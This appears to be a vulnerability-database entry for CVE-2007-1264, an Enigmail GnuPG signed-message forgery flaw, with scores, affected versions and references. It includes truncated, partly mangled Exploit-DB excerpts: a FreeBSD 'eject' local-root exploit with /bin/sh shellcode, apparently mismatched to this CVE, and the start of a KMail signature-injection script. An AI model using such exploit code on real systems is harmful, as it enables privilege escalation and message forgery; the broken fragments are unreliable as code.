CVE-2007-1264
Published 2007-03-06
Priority P4 · 29 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS 4.60% (90.5th percentile)
Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between signed and unsigned portions of OpenPGP messages with multiple components, which allows remote attackers to forge the contents of a message without detection.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | enigmail | < enigmail 2:0.95.0+1-1 (bullseye) | enigmail 2:0.95.0+1-1 (bullseye) |
| enigmail | enigmail | <= 0.94.2 | — |
| enigmail | enigmail | >= 0 < 2:0.95.0+1-1 | 2:0.95.0+1-1 |
CVSS provenance
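| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N |
| osv | — | 5.0 | MEDIUM | — |
| vendor_debian | — | 5.0 | LOW | — |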
GHSA
GHSA-7hv8-mc2f-v257: Enigmail 0
ghsa_unreviewed·2022-05-01
OSV
CVE-2007-1264: Enigmail 0
osv·2007-03-06·CVSS 5.0
Debian
CVE-2007-1264: enigmail - Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when ...
vendor_debian·2007·CVSS 5.0
Scope: local
bullseye: resolved (fixed in 2:0.95.0+1-1)
No detection rules found.
Exploit-DB
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
exploitdb·2007-03-26
CVE-2007-1719 FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
---
// ejecsploit.c - local root exploit for bsd's eject.c
// harry
// vuln found by kokanin (you 31337!!! ;))
// thanks to sacrine and all the other netric guys!!! you rule :)
#include
#include
#include
#include
#define LEN 1264
#define NOP 0x90
extern char** environ;
int main(){
char buf[LEN];
char* ptr;
char* arg[4];
unsigned int ret, i;
char shellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd"
"\x80\xe8\xe4\xff\xff\xff/bin/sh";
// hardcoded... too boneidle to fix this
ret = 0xbfbfee16;
char envshell[4096];
ptr = envshell;
for (i = 0; i > 8);
buf[LEN-3] = (char) ((0x00ff0000 & ret) >> 16);
buf[LEN-2] = (char) ((0xff000000 & ret) >> 24);
bu
Exploit-DB
KMail 1.x - GnuPG Arbitrary Content Injection
exploitdb·2007-03-05
CVE-2007-1264 KMail 1.x - GnuPG Arbitrary Content Injection
---
source: https://www.securityfocus.com/bid/22759/info
KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing.
An attacker may be able to exploit this issue to add arbitrary content into a GnuPG signed and/or encrypted message.
This vulnerability is due to the weakness discussed in BID 22757 (GnuPG Signed Message Arbitrary Content Injection Weakness) and has been assigned its own BID because of the specific way that KMail uses GnuPG.
This issue affects KMail versions prior to and including 1.9.5.
#!/usr/bin/python
import os, gpg, sys, base64
clear_sign = open(sys.argv[1], "rb").read().splitlines()
start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
No writeups or analysis indexed.
http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.html
http://secunia.com/advisories/24416
http://securityreason.com/securityalert/2353
http://www.coresecurity.com/?action=item&id=1687
http://www.securityfocus.com/archive/1/461958/100/0/threaded
http://www.securityfocus.com/archive/1/461958/30/7710/threaded
http://www.securityfocus.com/bid/22758
http://www.securitytracker.com/id?1017727
http://www.vupen.com/english/advisories/2007/0835
Published: 2007-03-06